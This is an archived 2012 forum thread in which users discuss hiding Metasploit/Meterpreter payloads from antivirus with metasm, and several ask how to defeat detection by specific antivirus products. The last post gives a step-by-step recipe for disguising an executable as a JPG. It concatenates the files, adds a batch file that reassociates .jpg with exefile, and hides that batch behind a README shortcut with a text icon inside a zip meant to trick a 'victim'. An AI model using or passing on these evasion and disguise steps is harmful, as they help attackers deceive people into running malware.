PDA

View Full Version : [VIDEO]bt5r1_"msf-suite"_bypass_MY_AV'S



zimmaro
02-19-2012, 05:08 PM
hi guys::)
premise:
the network being a "thing" free, I came across a "compelling" read: (thanks)
http://www.pentestgeek.com/2012/01/25/using-metasm-to-avoid-antivirus-detection-ghost-writing-asm/
(I recommend visiting the address before watching my video:))
I wanted to test the "content" on MY bt5r1 doing a "" "video" "
deserves & credits NOT GO TO ME!!....but for them!

if you want to watch: http://vimeo.com/37071571

ps:as always sorry for the quality && errors !

Sharan
02-19-2012, 08:41 PM
Great work but do you know why it is needed to write the
.section '.text' rwx
.entrypoint
at the beggining of the asm file ? I just don't get it what that does

LHYX1
02-20-2012, 11:56 AM
It makes the .Text segment of your file executable.

zimmaro
02-20-2012, 05:41 PM
hi
I state to be super-INexperienced, but reading around it seems to me that should:###allow the "section of area-code" to will be executable ###
........ take it with tongs :)
bye

ozoubi
02-20-2012, 08:52 PM
Hi Zimmaro,

many thanks for your interesting post, i just tried it but still detected ( i have avria AV), any advise?

thank you in advance ...

tatiana23
02-21-2012, 06:16 AM
hello when I dialout with the av Meterpreter accuses microsoft -> win32/swort.a
Anyone know how to spend it?

tatiana23
02-21-2012, 07:14 AM
hello when I dialout with the av Meterpreter accuses microsoft -> win32/swort.a
Anyone know how to spend it?

zimmaro
02-23-2012, 06:19 AM
hi,
ozoubi
"Are totally unprepared" to give you a definite answer, surely there will be a way ... working on "different types of encoding" .. try doing a specific search, and make test!. (I tried with 2 most used in my circle of "friends") (I DO NOT USE ViruScan-site)
try to "talk with the guys from the" "link posted" " & also in this forum there are people very, very helpful and prepared! (except me :))

ozoubi
02-25-2012, 09:05 PM
please just one more question.. :)
any idea how to merge the exe file with any other file format ( pdf,jpg,avi....)

thank you in advance..

zimmaro
02-28-2012, 05:21 AM
hi
Hello there should be several ways
they are found on the net! from the various software "" binder "" or use" winrar-method".
Also in SET if I remember correctly has some similar things that exploit some vulns
I tried to use this!! worked on CMD.exe (Windows) OR with linux under Wine(copy in linux the file cmd.exe "version winxp" ):
you need:
1)a.exe :) :)
2)a.jpg
3)create a folder "photo" in desktop
4)cut & paste 2files into folder
5)open cmd.exe(windows)& goto dir of "photo"folder
6)write " copy /b a.exe + a.jpg a1.jpg "
7)open a test folder to have 3 files (a.exe a.jpg a1.jpg)
8) delete a.exe & a.jpg
9)open a new notepad & write: @echo off
assoc .jpg=exefile
start a1.jpg
assoc .jpg=jpgfile
10)save as HELLO.bat in photo folder
11)create a shortcut of HELLO.bat
12)change icon of shortcut(need "txt-icon")keydx> proprieties>link>change icon.....ok
13)rename (shorcut)HELLO.bat in README (use fantasy with "social-engineering")
14)zip the folder >photo.zip
when victim open compres-folder(don't have .exe) and * play *README the process a1.jpg(:) :)) start.......
bye